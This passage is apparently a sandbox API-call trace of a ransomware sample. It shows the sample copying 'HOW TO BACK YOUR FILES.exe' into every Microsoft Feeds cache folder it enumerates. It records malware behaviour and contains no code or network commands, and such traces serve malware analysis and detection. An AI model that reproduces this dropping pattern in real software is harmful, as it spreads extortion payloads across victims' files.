lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Microsoft\\Feeds Cache\\KQMHSVKD\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\application data\\microsoft\\feeds cache\\kqmhsvkd\\how to back your files.exe"), bFailIfExists=1) returned 0 [0104.695] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0104.695] GetLastError () returned 0x0 [0104.695] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0104.696] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0104.696] CloseHandle (hObject=0x120) returned 1 [0104.696] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x33afb0 | out: hHeap=0x2b0000) returned 1 [0104.696] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0104.696] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Microsoft\\Feeds Cache\\KQMHSVKD\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x28d257a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x6cdb9be0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x6cdb9be0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0104.696] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0104.696] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0104.696] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Microsoft\\Feeds Cache\\D68G7BIJ", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Microsoft\\Feeds Cache\\D68G7BIJ") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Microsoft\\Feeds Cache\\D68G7BIJ" [0104.696] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2dd8a0 | out: hHeap=0x2b0000) returned 1 [0104.696] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7a48 | out: hHeap=0x2b0000) returned 1 [0104.696] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Microsoft\\Feeds Cache\\D68G7BIJ") returned 92 [0104.696] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Microsoft\\Feeds Cache\\D68G7BIJ" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Microsoft\\Feeds Cache\\D68G7BIJ") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Microsoft\\Feeds Cache\\D68G7BIJ" [0104.696] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0104.696] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Microsoft\\Feeds Cache\\D68G7BIJ\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\application data\\microsoft\\feeds cache\\d68g7bij\\how to back your files.exe"), bFailIfExists=1) returned 0 [0104.697] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0104.697] GetLastError () returned 0x0 [0104.697] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0104.697] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0104.697] CloseHandle (hObject=0x120) returned 1 [0104.697] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x33afb0 | out: hHeap=0x2b0000) returned 1 [0104.697] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0104.697] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Microsoft\\Feeds Cache\\D68G7BIJ\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x28d257a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x6cddfd40, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x6cddfd40, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0104.698] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0104.698] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0104.698] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Microsoft\\Feeds Cache\\6ASVN7J7", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Microsoft\\Feeds Cache\\6ASVN7J7") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Microsoft\\Feeds Cache\\6ASVN7J7" [0104.698] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2dd7d8 | out: hHeap=0x2b0000) returned 1 [0104.698] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7a28 | out: hHeap=0x2b0000) returned 1 [0104.698] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Microsoft\\Feeds Cache\\6ASVN7J7") returned 92 [0104.698] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Microsoft\\Feeds Cache\\6ASVN7J7" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Microsoft\\Feeds Cache\\6ASVN7J7") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Microsoft\\Feeds Cache\\6ASVN7J7" [0104.698] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0104.698] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Microsoft\\Feeds Cache\\6ASVN7J7\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\application data\\microsoft\\feeds cache\\6asvn7j7\\how to back your files.exe"), bFailIfExists=1) returned 0 [0104.699] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0104.699] GetLastError () returned 0x0 [0104.699] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0104.699] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0104.699] CloseHandle (hObject=0x120) returned 1 [0104.699] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x33afb0 | out: hHeap=0x2b0000) returned 1 [0104.699] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0104.699] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Microsoft\\Feeds Cache\\6ASVN7J7\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x28d257a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x6ce05ea0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x6ce05ea0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0104.699] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0104.699] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0104.699] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Microsoft\\Feeds Cache\\1NBUR4HR", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Microsoft\\Feeds Cache\\1NBUR4HR") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Microsoft\\Feeds Cache\\1NBUR4HR" [0104.699] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2dd710 | out: hHeap=0x2b0000) returned 1 [0104.699] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7a08 | out: hHeap=0x2b0000) returned 1 [0104.700] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Microsoft\\Feeds Cache\\1NBUR4HR") returned 92 [0104.700] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Microsoft\\Feeds Cache\\1NBUR4HR" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Microsoft\\Feeds Cache\\1NBUR4HR") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Microsoft\\Feeds Cache\\1NBUR4HR" [0104.700] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0104.700] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Microsoft\\Feeds Cache\\1NBUR4HR\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\application data\\microsoft\\feeds cache\\1nbur4hr\\how to back your files.exe"), bFailIfExists=1) returned 0 [0104.700] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0104.701] GetLastError () returned 0x0 [0104.701] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0104.701] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0104.701] CloseHandle (hObject=0x120) returned 1 [0104.701] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x33afb0 | out: hHeap=0x2b0000) returned 1 [0104.701] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0104.701] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Microsoft\\Feeds Cache\\1NBUR4HR\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x28d257a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x6ce05ea0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x6ce05ea0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0104.701] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0104.701] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0104.701] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Microsoft\\Feeds", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Microsoft\\Feeds") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Microsoft\\Feeds" [0104.702] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cfe50 | out: hHeap=0x2b0000) returned 1 [0104.702] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e79e8 | out: hHeap=0x2b0000) returned 1 [0104.702] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Microsoft\\Feeds") returned 77 [0104.702] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Microsoft\\Feeds" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Microsoft\\Feeds") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Microsoft\\Feeds" [0104.702] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0104.702] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Microsoft\\Feeds\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\application data\\microsoft\\feeds\\how to back your files.exe"), bFailIfExists=1) returned 0 [0104.703] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0104.703] GetLastError () returned 0x0 [0104.703] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0104.703] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0104.703] CloseHandle (hObject=0x120) returned 1 [0104.703] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x33afb0 | out: hHeap=0x2b0000) returned 1 [0104.703] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0104.703] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Microsoft\\Feeds\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x28d257a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x6ce2c000, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x6ce2c000, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0104.704] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0104.704] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0104.704] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~" [0104.704] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2c8eb8 | out: hHeap=0x2b0000) returned 1 [0104.704] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7a08 | out: hHeap=0x2b0000) returned 1 [0104.704] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~") returned 117 [0104.704] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~" [0104.704] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0104.704] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\application data\\microsoft\\feeds\\{5588acfd-6436-411b-a5ce-666ae6a92d3d}~\\how to back your files.exe"), bFailIfExists=1) returned 0 [0104.705] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0104.705] GetLastError () returned 0x0 [0104.705] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0104.705] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0104.705] CloseHandle (hObject=0x120) returned 1 [0104.705] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x33afb0 | out: hHeap=0x2b0000) returned 1 [0104.705] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0104.705] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0x28d257a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x4dd1ee20, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4dd1ee20, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0104.705] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0104.705] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0104.705] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\\WebSlices~", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\\WebSlices~") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\\WebSlices~" [0104.705] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x32afc8 | out: hHeap=0x2b0000) returned 1 [0104.705] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7a08 | out: hHeap=0x2b0000) returned 1 [0104.705] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\\WebSlices~") returned 128 [0104.705] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\\WebSlices~" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\\WebSlices~") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\\WebSlices~" [0104.706] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0104.706] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\\WebSlices~\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\application data\\microsoft\\feeds\\{5588acfd-6436-411b-a5ce-666ae6a92d3d}~\\webslices~\\how to back your files.exe"), bFailIfExists=1) returned 0 [0104.706] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0104.707] GetLastError () returned 0x0 [0104.707] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0104.707] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0104.707] CloseHandle (hObject=0x120) returned 1 [0104.707] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x33afb0 | out: hHeap=0x2b0000) returned 1 [0104.707] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0104.707] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\\WebSlices~\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0x28d257a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x6ce52160, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x6ce52160, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0104.707] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0104.707] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0104.707] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Microsoft\\Feeds\\Microsoft Feeds~", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Microsoft\\Feeds\\Microsoft Feeds~") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Microsoft\\Feeds\\Microsoft Feeds~" [0104.707] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2dd710 | out: hHeap=0x2b0000) returned 1 [0104.707] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e79e8 | out: hHeap=0x2b0000) returned 1 [0104.707] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Microsoft\\Feeds\\Microsoft Feeds~") returned 94 [0104.707] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Microsoft\\Feeds\\Microsoft Feeds~" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Microsoft\\Feeds\\Microsoft Feeds~") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Microsoft\\Feeds\\Microsoft Feeds~" [0104.707] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0104.707] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application 